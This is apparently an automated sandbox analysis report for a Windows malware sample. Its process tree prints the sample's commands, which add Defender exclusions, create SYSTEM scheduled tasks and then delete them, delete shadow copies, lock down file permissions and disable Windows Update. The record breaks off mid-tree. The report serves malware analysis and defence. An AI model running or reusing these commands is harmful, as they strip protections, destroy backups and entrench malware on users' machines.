Analysis

  • max time kernel
    143s
  • max time network
    153s
  • platform
    windows11-ltsc_2024_x64
  • resource
    win11ltsc2024-20260911-en
  • resource tags

    arch:x64arch:x86image:win11ltsc2024-20260911-enlocale:en-usos:windows11-ltsc_2024-x64systemwindows
  • submitted
    16/09/2026, 07:50

General

  • Target
    install_s.8.06.exe
  • Size 24.6MB
  • Sample260916-jpm95axbqa
  • SHA256 b39e39232154a7290d3e9e3928fd40e4c4a4ca17991c124752c901b7056d5d3f
  • MD5 SHA1 SHA512 SSDEEP TLSH

Malware Config

Signatures

  • UAC bypass 3 TTPs 2 IoCs
  • Windows security bypass 2 TTPs 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 1 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Possible privilege escalation attempt 23 IoCs
  • Disables service(s) 3 TTPs
  • Executes dropped EXE 11 IoCs
  • Loads dropped DLL 8 IoCs
  • Modifies file permissions 1 TTPs 23 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Indicator Removal: Clear Persistence 1 TTPs 10 IoCs

    Clear artifacts associated with previously established persistence like scheduletasks on a host.

  • Drops file in System32 directory 1 IoCs
  • UPX packed file 6 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 18 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Screensaver 1 TTPs 3 IoCs

    Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.

  • Executes a command shell one-liner 1 TTPs 28 IoCs

    Execution of a cmd.exe one-liner (/c "close" or /k "keep") is a common script/loader stage.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Control Panel 4 IoCs
  • Modifies registry class 4 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 32 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 4 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\install_s.8.06.exe
    "C:\Users\Admin\AppData\Local\Temp\install_s.8.06.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    PID:4232
  • C:\Users\Public\v4Sbuu\nrkfjc.exe
    "C:\Users\Public\v4Sbuu\nrkfjc.exe"
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Adds Run key to start application
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2680
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\ProgramData','C:\Users','C:\Program Files (x86)','C:\' -Force
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of AdjustPrivilegeToken
      PID:616
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\v4Sbuu\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
      2⤵
      • Indicator Removal: Clear Persistence
      • Suspicious use of WriteProcessMemory
      PID:1764
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\v4Sbuu\" /t REG_DWORD /d 0 /f"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:4504
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Run /TN "Task1"
        3⤵
          PID:5768
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Delete /TN "Task1" /F
          3⤵
            PID:6024
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
          2⤵
          • Indicator Removal: Clear Persistence
          • Suspicious use of WriteProcessMemory
          PID:1556
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
            3⤵
            • Scheduled Task/Job: Scheduled Task
            PID:3876
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Run /TN "Task1"
            3⤵
              PID:3632
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Delete /TN "Task1" /F
              3⤵
                PID:3828
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
              2⤵
              • Indicator Removal: Clear Persistence
              • Suspicious use of WriteProcessMemory
              PID:6100
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                3⤵
                • Scheduled Task/Job: Scheduled Task
                PID:1120
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Run /TN "Task1"
                3⤵
                  PID:4716
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Delete /TN "Task1" /F
                  3⤵
                    PID:5704
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                  2⤵
                  • Indicator Removal: Clear Persistence
                  • Suspicious use of WriteProcessMemory
                  PID:1832
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                    3⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:3100
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Run /TN "Task1"
                    3⤵
                      PID:2740
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Delete /TN "Task1" /F
                      3⤵
                        PID:1172
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                      2⤵
                      • Indicator Removal: Clear Persistence
                      • Suspicious use of WriteProcessMemory
                      PID:5376
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Admin\Documents\" /t REG_DWORD /d 0 /f"
                        3⤵
                        • Scheduled Task/Job: Scheduled Task
                        PID:1140
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Run /TN "Task1"
                        3⤵
                          PID:5268
                        • C:\Windows\system32\schtasks.exe
                          SCHTASKS /Delete /TN "Task1" /F
                          3⤵
                            PID:4916
                        • C:\Program Files (x86)\3BKYDt\o1NX3q.exe
                          "C:\Program Files (x86)\3BKYDt\o1NX3q.exe"
                          2⤵
                          • UAC bypass
                          • Drops file in Drivers directory
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Adds Run key to start application
                          • Drops file in Program Files directory
                          • Event Triggered Execution: Screensaver
                          • System Location Discovery: System Language Discovery
                          • Checks processor information in registry
                          • Modifies Control Panel
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          • System policy modification
                          PID:4580
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c vssadmin delete shadows /all /quiet
                            3⤵
                            • Executes a command shell one-liner
                            PID:2192
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\3BKYDt" /inheritance:r
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:484
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\3BKYDt" /inheritance:r
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:3492
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:908
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            PID:1720
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:5340
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\3BKYDt" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:2732
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\3BKYDt" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:3388
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\3BKYDt" /grant:r Users:(OI)(CI)(RX) /deny Users:(OI)(CI)(DC)
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:1096
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\3BKYDt" /grant:r Users:(OI)(CI)(RX) /deny Users:(OI)(CI)(DC)
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:3688
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\3BKYDt\o1NX3q.exe" /inheritance:r
                            3⤵
                            • Executes a command shell one-liner
                            • Suspicious use of WriteProcessMemory
                            PID:1784
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\3BKYDt\o1NX3q.exe" /inheritance:r
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:928
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\3BKYDt\o1NX3q.exe" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:5800
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\3BKYDt\o1NX3q.exe" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:3828
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\3BKYDt\o1NX3q.exe" /grant:r Users:(RX) /deny Users:(DE)
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:6092
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\3BKYDt\o1NX3q.exe" /grant:r Users:(RX) /deny Users:(DE)
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:2928
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\3BKYDt\image.png" /inheritance:r
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:3472
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\3BKYDt\image.png" /inheritance:r
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              PID:1424
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\3BKYDt\image.png" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:2040
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\3BKYDt\image.png" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:2532
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\3BKYDt\image.png" /grant:r Users:(RX) /deny Users:(DE)
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:2104
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\3BKYDt\image.png" /grant:r Users:(RX) /deny Users:(DE)
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:3816
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\3BKYDt\thumbs.db" /inheritance:r
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:4844
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\3BKYDt\thumbs.db" /inheritance:r
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:3872
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\3BKYDt\thumbs.db" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:1268
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\3BKYDt\thumbs.db" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              PID:4960
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\3BKYDt\thumbs.db" /grant:r Users:(RX) /deny Users:(DE)
                            3⤵
                            • Executes a command shell one-liner
                            • Suspicious use of WriteProcessMemory
                            PID:432
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\3BKYDt\thumbs.db" /grant:r Users:(RX) /deny Users:(DE)
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:4908
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\3BKYDt\XPSPLOG.dll" /inheritance:r
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:2944
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\3BKYDt\XPSPLOG.dll" /inheritance:r
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              PID:3452
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\3BKYDt\XPSPLOG.dll" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:2092
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\3BKYDt\XPSPLOG.dll" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:5740
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\3BKYDt\XPSPLOG.dll" /grant:r Users:(RX) /deny Users:(DE)
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:2992
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\3BKYDt\XPSPLOG.dll" /grant:r Users:(RX) /deny Users:(DE)
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              PID:5716
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\ProgramData','C:\Users','C:\Program Files (x86)' -Force
                            3⤵
                            • Command and Scripting Interpreter: PowerShell
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2128
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" cmd.exe /q /c "@echo off & (for %i in (wuauserv UsoSvc uhssvc WaaSMedicSvc) do ( net stop %i >nul 2>&1 & sc config %i start= disabled >nul 2>&1 & sc failure %i reset= 0 actions= "" >nul 2>&1 )) & (for %i in (WaaSMedicSvc wuaueng) do ( takeown /f C:\Windows\System32\%i.dll >nul 2>&1 & icacls C:\Windows\System32\%i.dll /grant *S-1-1-0:F >nul 2>&1 & rename C:\Windows\System32\%i.dll %i_BAK.dll >nul 2>&1 & icacls C:\Windows\System32\%i_BAK.dll /setowner "NT SERVICE\TrustedInstaller" >nul 2>&1 & icacls C:\Windows\System32\%i_BAK.dll /remove *S-1-1-0 >nul 2>&1 )) & reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f >nul 2>&1 & reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f >nul 2>&1 & reg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f >nul 2>&1 & erase /f /s /q c:\windows\softwaredistribution\*.* >nul 2>&1 & rmdir /s /q c:\windows\softwaredistribution >nul 2>&1 & powershell -NoProfile -WindowStyle Hidden -Command "& {Get-ScheduledTask -TaskPath '\Microsoft\Windows\InstallService\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateOrchestrator\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateAssistant\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WaaSMedic\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue;}" >nul 2>&1"
                            3⤵
                            • Executes a command shell one-liner
                            • Suspicious use of WriteProcessMemory
                            PID:4508
                            • C:\Windows\SysWOW64\net.exe
                              net stop wuauserv
                              4⤵
                                PID:3736
                                • C:\Windows\SysWOW64\net1.exe
                                  C:\Windows\system32\net1 stop wuauserv
                                  5⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:824
                              • C:\Windows\SysWOW64\sc.exe
                                sc config wuauserv start= disabled
                                4⤵
                                • Launches sc.exe
                                • System Location Discovery: System Language Discovery
                                PID:5696
                              • C:\Windows\SysWOW64\sc.exe
                                sc failure wuauserv reset= 0 actions= ""
                                4⤵
                                • Launches sc.exe
                                • System Location Discovery: System Language Discovery
                                PID:2772
                              • C:\Windows\SysWOW64\net.exe
                                net stop UsoSvc
                                4⤵
                                • System Location Discovery: System Language Discovery
                                PID:956
                                • C:\Windows\SysWOW64\net1.exe
                                  C:\Windows\system32\net1 stop UsoSvc
                                  5⤵
                                    PID:2108
                                • C:\Windows\SysWOW64\sc.exe
                                  sc config UsoSvc start= disabled
                                  4⤵
                                  • Launches sc.exe
                                  • System Location Discovery: System Language Discovery
                                  PID:4924
                                • C:\Windows\SysWOW64\sc.exe
                                  sc failure UsoSvc reset= 0 actions= ""
                                  4⤵
                                  • Launches sc.exe
                                  PID:6120
                                • C:\Windows\SysWOW64\net.exe
                                  net stop uhssvc
                                  4⤵
                                    PID:4124
                                    • C:\Windows\SysWOW64\net1.exe
                                      C:\Windows\system32\net1 stop uhssvc
                                      5⤵
                                        PID:3508
                                    • C:\Windows\SysWOW64\sc.exe
                                      sc config uhssvc start= disabled
                                      4⤵
                                      • Launches sc.exe
                                      • System Location Discovery: System Language Discovery
                                      PID:3436
                                    • C:\Windows\SysWOW64\sc.exe
                                      sc failure uhssvc reset= 0 actions= ""
                                      4⤵
                                      • Launches sc.exe
                                      PID:964
                                    • C:\Windows\SysWOW64\net.exe
                                      net stop WaaSMedicSvc
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:1492
                                      • C:\Windows\SysWOW64\net1.exe
                                        C:\Windows\system32\net1 stop WaaSMedicSvc
                                        5⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:4260
                                    • C:\Windows\SysWOW64\sc.exe
                                      sc config WaaSMedicSvc start= disabled
                                      4⤵
                                      • Launches sc.exe
                                      PID:4416
                                    • C:\Windows\SysWOW64\sc.exe
                                      sc failure WaaSMedicSvc reset= 0 actions= ""
                                      4⤵
                                      • Launches sc.exe
                                      • System Location Discovery: System Language Discovery
                                      PID:5704
                                    • C:\Windows\SysWOW64\takeown.exe
                                      takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                      4⤵
                                      • Possible privilege escalation attempt
                                      • Modifies file permissions
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:5036
                                    • C:\Windows\SysWOW64\icacls.exe
                                      icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F
                                      4⤵
                                      • Possible privilege escalation attempt
                                      • Modifies file permissions
                                      PID:2952
                                    • C:\Windows\SysWOW64\icacls.exe
                                      icacls C:\Windows\System32\WaaSMedicSvc_BAK.dll /setowner "NT SERVICE\TrustedInstaller"
                                      4⤵
                                      • Possible privilege escalation attempt
                                      • Modifies file permissions
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2740
                                    • C:\Windows\SysWOW64\icacls.exe
                                      icacls C:\Windows\System32\WaaSMedicSvc_BAK.dll /remove *S-1-1-0
                                      4⤵
                                      • Possible privilege escalation attempt
                                      • Modifies file permissions
                                      • System Location Discovery: System Language Discovery
                                      PID:5656
                                    • C:\Windows\SysWOW64\takeown.exe
                                      takeown /f C:\Windows\System32\wuaueng.dll
                                      4⤵
                                      • Possible privilege escalation attempt
                                      • Modifies file permissions
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:5288
                                    • C:\Windows\SysWOW64\icacls.exe
                                      icacls C:\Windows\System32\wuaueng.dll /grant *S-1-1-0:F
                                      4⤵
                                      • Possible privilege escalation attempt
                                      • Modifies file permissions
                                      • System Location Discovery: System Language Discovery
                                      PID:3872
                                    • C:\Windows\SysWOW64\icacls.exe
                                      icacls C:\Windows\System32\wuaueng_BAK.dll /setowner "NT SERVICE\TrustedInstaller"
                                      4⤵
                                      • Possible privilege escalation attempt
                                      • Modifies file permissions
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3272
                                    • C:\Windows\SysWOW64\icacls.exe
                                      icacls C:\Windows\System32\wuaueng_BAK.dll /remove *S-1-1-0
                                      4⤵
                                      • Possible privilege escalation attempt
                                      • Modifies file permissions
                                      • System Location Discovery: System Language Discovery
                                      PID:2748
                                    • C:\Windows\SysWOW64\reg.exe
                                      reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:4960
                                    • C:\Windows\SysWOW64\reg.exe
                                      reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:4480
                                    • C:\Windows\SysWOW64\reg.exe
                                      reg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2820
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -NoProfile -WindowStyle Hidden -Command "& {Get-ScheduledTask -TaskPath '\Microsoft\Windows\InstallService\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateOrchestrator\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateAssistant\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WaaSMedic\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue;}"
                                      4⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3528
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\3BKYDt\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                    3⤵
                                    • Indicator Removal: Clear Persistence
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious use of WriteProcessMemory
                                    PID:3704
                                    • C:\Windows\SysWOW64\schtasks.exe
